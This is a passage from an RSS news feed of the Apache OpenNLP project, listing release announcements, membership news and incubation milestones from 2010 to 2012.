| <p>Additionally the release contains the following noteworthy changes:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Porter Stemmer tool</p> |
| </li> |
| <li> |
| <p>L-BFGS parameter estimation</p> |
| </li> |
| <li> |
| <p>Improved documentation</p> |
| </li> |
| <li> |
| <p>Fine-grained POSTagger evaluation report</p> |
| </li> |
| <li> |
| <p>Improved support to load user provided feature generator and context validation classes from OSGi environment</p> |
| </li> |
| <li> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the RELEASE_NOTES file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>OpenNLP graduated from the incubator as a Top Level Project</title> |
| <link>https://opennlp.apache.org/news/news-2012-02-15.html</link> |
| <pubDate>Wed, 15 Feb 2012 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/news-2012-02-15.html</guid> |
| <description> |
| <div class="sect1"> |
| <h2 id="interview_on_cynical_developer_podcast">Interview on Cynical Developer podcast</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>OpenNLP graduated from the incubator as a Top Level Project</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>New members and new features&#8230;&#8203;</title> |
| <link>https://opennlp.apache.org/news/news-2011-12-22.html</link> |
| <pubDate>Thu, 22 Dec 2011 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/news-2011-12-22.html</guid> |
| <description> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Join everyone in welcoming our newest members to the group, Aliaksandr Autayeu and Boris Galitsky.</p> |
| </li> |
| <li> |
| <p>OpenNLP is moving forward with new features, fixes and advancements for the New Year.</p> |
| </li> |
| <li> |
| <p>Merry Christmas &amp; Happy New Year! Again&#8230;&#8203; yes, it has been another year.</p> |
| </li> |
| </ul> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.5.2 Incubating released</title> |
| <link>https://opennlp.apache.org/news/release-152.html</link> |
| <pubDate>Mon, 28 Nov 2011 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-152.html</guid> |
| <description> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of version 1.5.2-incubating of |
| Apache OpenNLP.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural |
| language text. It supports the most common NLP tasks, such as tokenization, sentence |
| segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, |
| and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP 1.5.2-incubating binary and source distributions are available for download |
| from our download page: |
| <a href="https://incubator.apache.org/opennlp/download.cgi" class="bare">https://incubator.apache.org/opennlp/download.cgi</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. |
| See the Maven Dependency page for more details: |
| <a href="https://incubator.apache.org/opennlp/maven-dependency.html" class="bare">https://incubator.apache.org/opennlp/maven-dependency.html</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>This release contains a couple of new features, improvements and bug fixes. |
| The maxent trainer can now run in multiple threads to utilize |
| multi-core CPUs, configurable feature generation was added to the name finder, |
| the perceptron trainer was refactored and improved, machine learners |
| can now be configured with much more options via a parameter file, |
| evaluators can print out detailed evaluation information.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Additionally the release contains the following noteworthy changes:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Improved the white space handling in the Sentence Detector and its training code</p> |
| </li> |
| <li> |
| <p>Added more cross validator command line tools</p> |
| </li> |
| <li> |
| <p>Command line handling code has been refactored</p> |
| </li> |
| <li> |
| <p>Fixed problems with the new build</p> |
| </li> |
| <li> |
| <p>Now uses fast token class feature generation code by default</p> |
| </li> |
| <li> |
| <p>Added support for BioNLP/NLPBA 2004 shared task data</p> |
| </li> |
| <li> |
| <p>Removal of old and deprecated code</p> |
| </li> |
| <li> |
| <p>Dictionary case sensitivity support is now done properly</p> |
| </li> |
| <li> |
| <p>Support for OSGi</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the RELEASE_NOTES |
| file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>First release of 1.5.1-incubating is ready!</title> |
| <link>https://opennlp.apache.org/news/news-2011-05-02.html</link> |
| <pubDate>Mon, 28 Nov 2011 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/news-2011-05-02.html</guid> |
| <description> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>First release of opennlp-1.5.1-incubating ready for primetime.</p> |
| </li> |
| <li> |
| <p>Voting started on opennlp-dev list voting +1 (5-binding and 2-non-binding).</p> |
| </li> |
| <li> |
| <p>Voting carried over to general list voting +1 (1-binding and 1-non-binding).</p> |
| </li> |
| <li> |
| <p>Recorded no 0 votes or -1 votes.</p> |
| </li> |
| </ul> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Issue tracker moved to JIRA</title> |
| <link>https://opennlp.apache.org/news/news-2011-01-29.html</link> |
| <pubDate>Sat, 29 Jan 2011 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/news-2011-01-29.html</guid> |
| <description> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>We have moved JIRA issues to a new list. Special THANKS go to Gavin for helping.</p> |
| </li> |
| <li> |
| <p>We are preparing for our first full release of the package.</p> |
| </li> |
| </ul> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Working on Apache Incubator requirements</title> |
| <link>https://opennlp.apache.org/news/news-2010-12-24.html</link> |
| <pubDate>Fri, 24 Dec 2010 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/news-2010-12-24.html</guid> |
| <description> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Merry Christmas &amp; Happy New Year!</p> |
| </li> |
| <li> |
| <p>We have the sources online, are working on porting the documentation, and cleanup of the code to meet Apache |
| Incubator requirements.</p> |
| </li> |
| </ul> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>OpenNLP is now into Apache Incubation!</title> |
| <link>https://opennlp.apache.org/news/news-2010-11-23.html</link> |
| <pubDate>Tue, 23 Nov 2010 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/news-2010-11-23.html</guid> |
| <description> |
| <div class="paragraph"> |
| <p>Apache Incubator voted +1 (8-binding and 9-non-binding votes) to accept OpenNLP into incubation.</p> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>OpenNLP is candidated to Apache Incubation!</title> |
| <link>https://opennlp.apache.org/news/news-2010-11-18.html</link> |
| <pubDate>Thu, 18 Nov 2010 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/news-2010-11-18.html</guid> |
| <description> |
| <div class="paragraph"> |
| <p>OpenNLP Proposal presented to general list for incubator.</p> |
| </div> |
| </description> |
| </item> |
| |
| </channel> |
| </rss> |